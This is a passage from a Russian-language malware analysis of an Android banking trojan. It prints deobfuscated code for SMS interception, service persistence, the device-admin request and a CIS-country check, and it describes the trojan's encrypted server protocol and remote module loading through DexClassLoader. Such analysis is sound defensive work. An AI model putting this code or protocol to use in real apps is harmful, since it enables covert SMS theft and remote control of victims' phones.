\t\t\t\tthis.f345b.mo22a(context, this.f344a.f12M, this.f344a.f42aP); \t\t\t} \t\t\tIntent intent2 = new Intent(context, lvhxcug.class); \t\t\tintent2.putExtra(this.f344a.f87bH, this.f344a.f42aP); \t\t\tintent2.addFlags(268435456); \t\t\tintent2.addFlags(536870912); \t\t\tintent2.addFlags(1073741824); \t\t\tcontext.startActivity(intent2); \t\t\tC0005b bVar6 = this.f345b; \t\t\tString str5 = this.f344a.f58af; \t\t\tStringBuilder sb8 = new StringBuilder(); \t\t\tthis.f344a.getClass(); \t\t\tsb8.append(\"\"); \t\t\tsb8.append(0); \t\t\tbVar6.mo22a(context, str5, sb8.toString()); \t\t}     } }<\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u0410 \u0442\u0435\u043f\u0435\u0440\u044c \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0439 \u043f\u043e \u043a\u043e\u0434\u0443. <\/p>\n<p>  \u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f XML \u0444\u0430\u0439\u043b\u0435, \u0444\u0430\u0439\u043b \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 <i>\/data\/data\/\u0438\u043c\u044f_\u043f\u0430\u043a\u0435\u0442\u0430\/shared_prefs\/Settings.xml<\/i><\/p>\n<ul>\n<li>public String ReadXML \u2014 \u043c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a<\/li>\n<li>public String SaveXML \u2014 \u043c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a<\/li>\n<li>public boolean DozeMode \u2014 \u041f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u043b\u0438 \u0440\u0435\u0436\u0438\u043c Doze Mode<\/li>\n<li>public class Service_fa extends Service \u2014 \u0421\u0435\u0440\u0432\u0438\u0441 \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u043a\u0438 \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0434\u0435\u0432\u0430\u0439\u0441\u0430 (\u0448\u0430\u0433\u0438, \u0442\u0440\u044f\u0441\u043a\u0430 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430 \u0438 \u043f\u0440\u043e\u0447\u0435\u0435)<\/li>\n<li>public class Service_server extends Service \u2014 \u0421\u0435\u0440\u0432\u0438\u0441 \u0434\u043b\u044f \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c<\/li>\n<li>public class Service_event_loop extends Service \u2014 \u0421\u0435\u0440\u0432\u0438\u0441 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0439 \u0432 \u0431\u0435\u0437\u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0446\u0438\u043a\u043b\u0435 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0439 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u043c\u0430\u043b\u0430\u0440\u0438<\/li>\n<li>public void startOffDozeMode \u2014 \u0437\u0430\u043f\u0440\u043e\u0441 \u0434\u043b\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0440\u0435\u0436\u0438\u043c\u0430 Doze Mode<\/li>\n<li>public void startAlarm \u2014 \u0417\u0430\u043f\u0443\u0441\u043a \u0440\u0435\u0441\u0438\u0432\u0435\u0440\u0430 \u043a\u0430\u0436\u0434\u044b\u0435 10 \u0441\u0435\u043a\u0443\u043d\u0434<\/li>\n<li>public void interceptionSMS \u2014 \u041c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u043f\u0435\u0440\u0435\u0445\u0430\u0442\u043e\u043c \u0421\u041c\u0421<\/li>\n<li>public boolean isAccessibilityService \u2014 \u043c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u043b\u0438 Accesibility Service \u0438\u043b\u0438 \u043d\u0435\u0442<\/li>\n<li>public boolean boolCIS \u2014 \u043c\u0435\u0442\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0443 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 \u043f\u043e \u0441\u0442\u0440\u0430\u043d\u0430\u043c, \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u043c \u0432 \u0421\u041d\u0413, \u0430 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u044d\u0442\u043e: ua, ru, by, tj, uz, tm, az, am, kz, kg \u0438 md (\u0441\u043e\u043a\u0440\u0430\u0449\u0451\u043d\u043d\u044b\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0441\u0442\u0440\u0430\u043d)<\/li>\n<\/ul>\n<p>  \u042f \u043f\u043e\u0441\u0442\u0430\u0440\u0430\u043b\u0441\u044f \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0432\u044b\u0448\u0435, \u0432 \u0431\u043e\u043b\u0435\u0435 \u0447\u0438\u0442\u0430\u0435\u043c\u044b\u0439 \u0438 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0432\u0438\u0434:<\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0427\u0438\u0442\u0430\u0435\u043c\u044b\u0439 \u043a\u043e\u0434<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"java\">public void onReceive(Context context, Intent intent) { public Class[] arrayService = {Service_fa.class, Service_server.class,  Service_event_loop.class};     if ((!ReadXML(context, \"kill\").contains(\"dead\")) &amp;&amp; (!boolCIS(context))) {         startAlarm(context, \"\", 10000);         for (int i = 0; i &lt; arrayService.length; i++) {             if ((Build.VERSION.SDK_INT &gt;= 26) &amp;&amp; (!DozeMode(context))) break;             if (!isMyServiceRunning(context, arrayService[i])) {                 if (Service_fa.class.getName().equals(arrayService[i].getName())) {                     startService(new Intent(context, arrayService[i]));                 } else if (Integer.parseInt(ReadXML(context, \"step\")) &gt;= 1) {                     startService(new Intent(context, arrayService[i]));                 }             }else{                 if(Service_server.class.getName().equals(arrayService[i].getName())){                     stopService(new Intent(context, arrayService[i]));                 }             }         }         startOffDozeMode(context);         if (intent.getAction().equals(\"android.provider.Telephony.SMS_RECEIVED\")) {             interceptionSMS(context, intent); \/\/ \u041f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u0421\u041c\u0421         }         if (isAdminDevice(context)) {             if ((getScreenBoolean(context)) &amp;&amp; (isAccessibilityServiceEnabled(context, srvSccessibility.class))) {                 if (isAccessibilityServiceEnabled(context, srvSccessibility.class)) {                     SaveXML(context, consts.autoClick, \"1\");                 }                 Intent intent = new Intent(context, Admin.class);                 intent.putExtra(\"admin\", \"1\");                 intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);                 intent.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);                 intent.addFlags(Intent.FLAG_ACTIVITY_NO_HISTORY);                 startActivity(intent);             }         }     }     public void  interceptionSMS(Context context, Intent intent){         Bundle bundle = intent.getExtras();         if (bundle != null) {             final Object[] pdus = (Object[]) bundle.get(consts.string_116);             String number = \"\";             String text = \"\";             if (pdus != null) {                 for (Object aPdusObj : pdus) {                     SmsMessage smsMessage = SmsMessage.createFromPdu((byte[]) aPdusObj);                     number = smsMessage.getDisplayOriginatingAddress();                     text += smsMessage.getDisplayMessageBody();                 }                 SaveXML(context, \"LogSMS\",  \"Number: \" + number + \" Text: \" + text + \"::endLog::\");             }         }     } }<\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u0422\u0430\u043a \u0434\u0443\u043c\u0430\u044e \u043a\u043e\u0434 \u0441\u0442\u0430\u043b \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043d\u044f\u0442\u0435\u043d \u043c\u043d\u043e\u0433\u0438\u043c \u0447\u0438\u0442\u0430\u0442\u0435\u043b\u044f\u043c. <\/p>\n<p>  \u0423 Receiver \u0435\u0441\u0442\u044c 3 \u0442\u0440\u0438\u0433\u0433\u0435\u0440\u0430 \u043d\u0430 \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043d\u0438\u0435, \u0430 \u044d\u0442\u043e \u043f\u0440\u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u0421\u041c\u0421 \u0438\u043b\u0438 \u043f\u0440\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0435 Alarmon.<\/p>\n<p>  \u0422\u0430\u043a \u0436\u0435 Receiver \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 3 \u0441\u0435\u0440\u0432\u0438\u0441\u0430:<\/p>\n<ul>\n<li>C\u0431\u043e\u0440 \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0434\u0435\u0432\u0430\u0439\u0441\u0430(Service_fa)<\/li>\n<li>\u0421\u0435\u0440\u0432\u0438\u0441 \u0434\u043b\u044f \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c(Service_server)<\/li>\n<li>\u0421\u0435\u0440\u0432\u0438\u0441 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0439 \u0432 \u0431\u0435c\u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0446\u0438\u043a\u043b\u0435 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0439 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u043c\u0430\u043b\u0432\u0430\u0440\u0438(Service_event_loop)<\/li>\n<\/ul>\n<p>  \u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f Service_fa \u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u043f\u0440\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 (\u0435\u0441\u043b\u0438 \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430 \u0445\u043e\u0434\u0438\u0442, \u0438 \u0442\u0440\u044f\u0441\u0451\u0442 \u0442\u0435\u043b\u0435\u0444\u043e\u043d), \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f Service_server \u0438 Service_event_loop. \u041e\u043d\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u043c \u043c\u0430\u043b\u0432\u0430\u0440\u0438, \u0442\u0430\u043a\u0438\u043c \u043c\u0435\u0442\u043e\u0434\u043e\u043c \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u044a\u0441\u0435\u044f\u0442\u044c \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0439 \u0434\u0435\u0432\u0430\u0439\u0441\u044b \u043e\u0442 \u044d\u043c\u0443\u043b\u044f\u0442\u043e\u0440\u043e\u0432 \u0438 \u0434\u0435\u0432\u0430\u0439\u0441\u043e\u0432 \u0440\u0435\u0441\u0451\u0447\u0435\u0440\u043e\u0432, \u0430\u0432 \u0438 \u043f\u0440\u043e\u0447\u0438\u0445. <\/p>\n<p>  \u0422\u0430\u043a \u0436\u0435 Receiver \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f Doze Mode \u0438 \u0437\u0430\u043f\u0440\u043e\u0441 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430.<\/p>\n<p>  \u0422\u0430\u043a \u043a\u0430\u043a \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430, \u0435\u0433\u043e \u043d\u0435\u043b\u044c\u0437\u044f \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0441 \u0434\u0435\u0432\u0430\u0439\u0441\u0430 \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u0443\u0434\u0443\u0442 \u0441\u043d\u044f\u0442\u044b \u043f\u0440\u0430\u0432\u0430.<\/p>\n<h2>\u041f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430<\/h2>\n<p>  \u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043a\u0430\u043a\u0438\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f Admin Device.<\/p>\n<pre><code class=\"xml\">&lt;!-- ADMIN DEVICE XML --&gt; &lt;?xml version=\"1.0\" encoding=\"utf-8\"?&gt; &lt;device-admin xmlns:android=\"http:\/\/schemas.android.com\/apk\/res\/android\" android:layout_width=\"match_parent\" android:layout_height=\"match_parent\"&gt;     &lt;uses-policies&gt;         &lt;force-lock\/&gt;         &lt;wipe-data\/&gt;     &lt;\/uses-policies&gt; &lt;\/device-admin&gt;<\/code><\/pre>\n<p>  \u044d\u043b\u0435\u043c\u0435\u043d\u0442 force-lock \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u043f\u0440\u0430\u0432\u0430 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u044d\u043a\u0440\u0430\u043d\u0430 \u0434\u0435\u0432\u0430\u0439\u0441\u0430, \u0430 wipe-data \u0437\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0440\u0430\u0437\u0434\u0435\u043b\u0430 DATA, CACHE, \u0438 \u0432\u0441\u0435\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 (\u0435\u0433\u043e \u043f\u043e\u043b\u043d\u044b\u0439 \u0441\u0431\u0440\u043e\u0441).<\/p>\n<h2>Service_fa<\/h2>\n<p>  \u041d\u0430 \u044d\u0442\u043e\u043c \u043c\u044b \u0437\u0430\u043a\u043e\u043d\u0447\u0438\u043c \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c Receiver, \u0438 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0434\u0440\u0443\u0433\u0438\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b. \u0421\u0435\u0440\u0432\u0438\u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043d\u0438\u043c\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0441\u0435\u043d\u0441\u043e\u0440\u043d\u044b\u0445 \u0434\u0430\u0442\u0447\u0438\u043a\u043e\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043a\u043b\u0430\u0441\u0441 SensorManager, \u044d\u0442\u043e\u0442 \u0441\u0435\u0440\u0432\u0438\u0441 \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0438\u0445 \u0432 \u0444\u0430\u0439\u043b XML.<\/p>\n<p>  \u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u044d\u0442\u043e\u043c\u0443 \u0437\u043b\u043e\u0434\u0435\u044f\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0441\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u0435\u0451 \u0430\u043d\u0430\u043b\u0438\u0437 \u0434\u043b\u044f \u043e\u0442\u0441\u0435\u0438\u0432\u0430\u043d\u0438\u044f \u044d\u043c\u0443\u043b\u044f\u0442\u043e\u0440\u043e\u0432 \u0438 \u043e\u0441\u043e\u0431\u043e \u043b\u0435\u043d\u0438\u0432\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.<\/p>\n<h2>Service_server<\/h2>\n<p>  \u042d\u0442\u043e\u0442 \u043f\u043e\u0442\u043e\u043a \u0441\u043e\u0437\u0434\u0430\u043d \u0434\u043b\u044f \u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c, \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0432 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0432\u0438\u0434\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f RC4 \u043a\u043e\u0434\u0438\u0440\u0443\u044f \u043f\u043e\u0441\u043b\u0435 \u043d\u0435\u0433\u043e \u0432\u0441\u0435 \u0432 base64.<\/p>\n<p>  \u041f\u0440\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u043f\u0435\u0440\u0432\u044b\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:<\/p>\n<pre><code class=\"json\">    {         \"id\":\"qoietjeoisfhjdfhk\",         \"idSettings\":\"\",         \"number\":\"+79999999999\",         \"statAdmin\":\"1\",         \"statProtect\":\"0\",         \"statScreen\":\"1\",         \"statAccessibilty\":\"0\",         \"statSMS\":\"1\",         \"statCards\":\"0\",         \"statBanks\":\"0\",         \"statMails\":\"0\",         \"activeDevice\":\"53\",         \"timeWorking\":\"342\",         \"statDownloadModule\":\"0\",         \"batteryLevel\":\"78\",         \"locale\":\"fr\"     } <\/code><\/pre>\n<p>  \u0414\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u044f \u0437\u0430\u043f\u043e\u043b\u043d\u0438\u043b \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043f\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0434\u0443\u043c\u0430\u044e \u0432\u0441\u0451 \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u043a\u0430\u043a\u043e\u0439 \u0437\u0430 \u0447\u0442\u043e \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442, \u043f\u043e \u044d\u0442\u043e\u043c\u0443 \u043d\u0430 \u0438\u0445 \u0440\u0430\u0437\u0431\u043e\u0440\u0435 \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0435 \u0431\u0443\u0434\u0435\u043c.<br \/>  \u0422\u0435\u043f\u0435\u0440\u044c \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043a\u0430\u043a\u0438\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0442\u0432\u0435\u0442\u044b \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u043b\u0438 \u043f\u0443\u0441\u0442\u043e\u0439 \u043e\u0442\u0432\u0435\u0442, \u0435\u0441\u043b\u0438 \u0434\u0430, \u0442\u043e \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442 \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0442\u044c \u043c\u0430\u0441\u0441\u0438\u0432 \u0434\u043e\u043c\u0435\u043d\u043e\u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0432 \u0446\u0438\u043a\u043b\u0435, \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u044d\u0442\u043e\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u043a\u0430\u0436\u0434\u044b\u0439 \u0434\u043e\u043c\u0435\u043d, \u0438 \u0435\u0441\u043b\u0438 \u0432 \u043e\u0442\u0432\u0435\u0442\u0435 \u0431\u0443\u0434\u0435\u0442 \u0441\u0442\u0440\u043e\u043a\u0430 == &#171;~I~&#187;, \u0442\u043e \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u044d\u0442\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0435 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0441 \u043d\u0438\u043c.<\/p>\n<p>  \u041c\u044b \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c \u0441 \u043a\u0430\u043a\u0438\u043c \u0434\u043e\u043c\u0435\u043d\u043e\u043c \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u043c, \u0442\u0435\u043f\u0435\u0440\u044c \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043e\u0442\u0432\u0435\u0442\u044b.<\/p>\n<p>  \u0415\u0441\u043b\u0438 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f Response == &#171;||youNeedMoreResources||&#187; \u0442\u043e \u0441\u0440\u0430\u0437\u0443 \u0438\u0434\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u043c\u043e\u0434\u0443\u043b\u044f \u043c\u0430\u043b\u0432\u0430\u0440\u0438:<br \/>  <i>gate_url?action=getModule&amp;data={\u00abidbot\u00bb:\u00abqoietjeoisfhjdfhk\u00bb}<\/i><br \/>  \u0418\u0434\u0435\u043c \u0434\u0430\u043b\u044c\u0448\u0435, Response == &#171;||no||&#187; <br \/>  \u043e\u0442\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u0430\u043f\u0440\u043e\u0441 <i>gate_url?action=registration&amp;data=JSON<\/i>:  <\/p>\n<pre><code class=\"json\">    {         \"id\":\"qoietjeoisfhjdfhk\",         \"android\": Build.VERSION.RELEASE,         \"tag\":\"tag\",         \"country\":\"fr\",         \"operator\":\"Megafon\",         \"model\":\"Samsung Galaxy S9\"     }<\/code><\/pre>\n<p>  \u042d\u0442\u043e\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u0441\u043b\u0443\u0436\u0438\u0442 \u0434\u043b\u044f \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u043d\u043e\u0432\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0430\u0434\u043c\u0438\u043d \u043f\u0430\u043d\u0435\u043b\u0438, \u043d\u0430 \u044d\u0442\u043e\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u0437\u0430\u043a\u043e\u043d\u0447\u0438\u043b\u0438\u0441\u044c.<\/p>\n<p>  \u041d\u043e \u043d\u0438\u0436\u0435 \u0435\u0441\u0442\u044c \u0443\u0441\u043b\u043e\u0432\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 \u00absystem.apk\u00bb.<\/p>\n<p>  \u041e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434: <\/p>\n<pre><code class=\"java\">if(new File(getDir(this.f301a.f215dd, 0), this.f301a.f115bj).exists()){}<\/code><\/pre>\n<p>  \u0423\u043f\u0440\u043e\u0449\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434: <\/p>\n<pre><code class=\"java\">if (new File(getDir(\"apk\", Context.MODE_PRIVATE), \"system.apk\").exists()) {}<\/code><\/pre>\n<p>  \u0435\u0441\u043b\u0438 \u0444\u0430\u0439\u043b \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442, \u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442\u0441\u044f JSON \u0432 \u0432\u0438\u0434\u0435:<\/p>\n<pre><code class=\"json\">{     \"params\":\"updateSettingsAndCommands\",     \"response\":\"data\"   }<\/code><\/pre>\n<p>  \u0412 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 response \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442\u0441\u044f \u043e\u0442\u0432\u0435\u0442 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0434\u0430\u043b\u0435\u0435 json \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442\u0441\u044f \u0432 \u043c\u0435\u0442\u043e\u0434 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043c\u043e\u0434\u0443\u043b\u0435 \u00absystem.apk\u00bb \u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043b\u0430\u0441\u0441\u0430 DexClassLoader \u043e\u043d \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f.<\/p>\n<h2>Service_event_loop<\/h2>\n<p>  \u0414\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0438\u0441 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432 \u0446\u0438\u043a\u043b\u0435 \u0438 \u0436\u0434\u0435\u0442 